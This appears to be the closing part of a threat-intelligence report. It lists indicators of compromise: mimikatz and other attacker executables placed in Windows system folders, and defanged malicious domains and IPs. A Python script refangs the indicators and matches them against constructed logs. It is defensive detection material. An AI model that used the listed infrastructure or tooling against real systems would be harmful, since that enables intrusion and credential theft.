C:\Users\{USERNAME}\Downloads\mimikatz-master.zip
C:\users\{USERNAME}\log.exe
C:\windows\adfs\ar\update.exe
C:\windows\system32\inetsrv\c.exe
C:\windows\system32\inetsrv\calc.exe
C:\windows\system32\winsw.exe
C:\Windows\System32\winsws.exe
C:\windows\system32\winuac.exe
C:\Windows\SYSVOL\Intel\mimikatz.exe
IP addresses and domain names:
360nvidia[.]com
web-telegram[.]uk
45.156.27[.]115
45.156.21[.]148
185.229.9[.]27
45.87.246[.]34
185.158.248[.]107
64.7.198[.]109
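The indicators above are defanged ([.] and hxxp://), so they cannot be searched for as written. The Python example below is added here and is not part of the report: it refangs the indicators and matches them against log lines with boundaries that avoid partial hits (a longer IP address or a longer domain name containing the indicator as a substring), while still allowing a subdomain of a listed domain to match. The log lines are constructed.

```python
import re

# Defanging conventions used in the indicator list above
DEFANG = [
    (re.compile(r"\[\.\]"), "."),
    (re.compile(r"\[:\]"), ":"),
    (re.compile(r"^hxxps?://", re.I),
     lambda m: m.group(0).lower().replace("hxxp", "http")),
]
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def refang(ioc):
    """Turn a defanged indicator back into its live form."""
    out = ioc.strip()
    for pattern, repl in DEFANG:
        out = pattern.sub(repl, out)
    return out


def compile_ioc(ioc):
    """Build a boundary-aware pattern for one indicator. An IP must stand alone
    (45.156.27.115 never hits 245.156.27.115); a domain or URL may be preceded
    by a subdomain label but not by more characters of a longer name."""
    live = refang(ioc)
    if IPV4.match(live):
        return live, re.compile(r"(?<![\w.-])" + re.escape(live) + r"(?![\w.-])")
    return live, re.compile(r"(?<![\w-])" + re.escape(live) + r"(?![\w.-])", re.I)


def match_lines(iocs, lines):
    """Return (line_number, live_ioc) pairs for every indicator hit."""
    compiled = [compile_ioc(i) for i in iocs]
    hits = []
    for n, line in enumerate(lines, 1):
        for live, pat in compiled:
            if pat.search(line):
                hits.append((n, live))
    return hits


# Indicators taken from this report, in their defanged form
IOCS = [
    "360nvidia[.]com",
    "45.156.27[.]115",
    "http[:]//45.87.246[.]34:443/calc.exe",
    "hxxp://localtonet[.]com/nssm-2.24.zip",
]

# Constructed proxy/DNS log lines; line 4 is a deliberate near-miss
SAMPLE_LOG = [
    "2024-09-12T10:14:02Z host01 proxy CONNECT 360nvidia.com:443 user=svc_build",
    "2024-09-12T10:15:44Z host01 proxy GET http://45.87.246.34:443/calc.exe 200",
    "2024-09-12T10:16:10Z host02 dns query cdn.360nvidia.com A",
    "2024-09-12T10:17:30Z host02 proxy CONNECT 245.156.27.115:443",
    "2024-09-12T10:18:01Z host03 proxy GET http://localtonet.com/nssm-2.24.zip 200",
]

if __name__ == "__main__":
    for n, ioc in match_lines(IOCS, SAMPLE_LOG):
        print(f"line {n}: {ioc}")
```

Note that the localtonet.com download URLs are listed as indicators because the attackers fetched their tooling from there, not because the site itself is malicious; matching the full URL rather than the bare domain keeps that distinction.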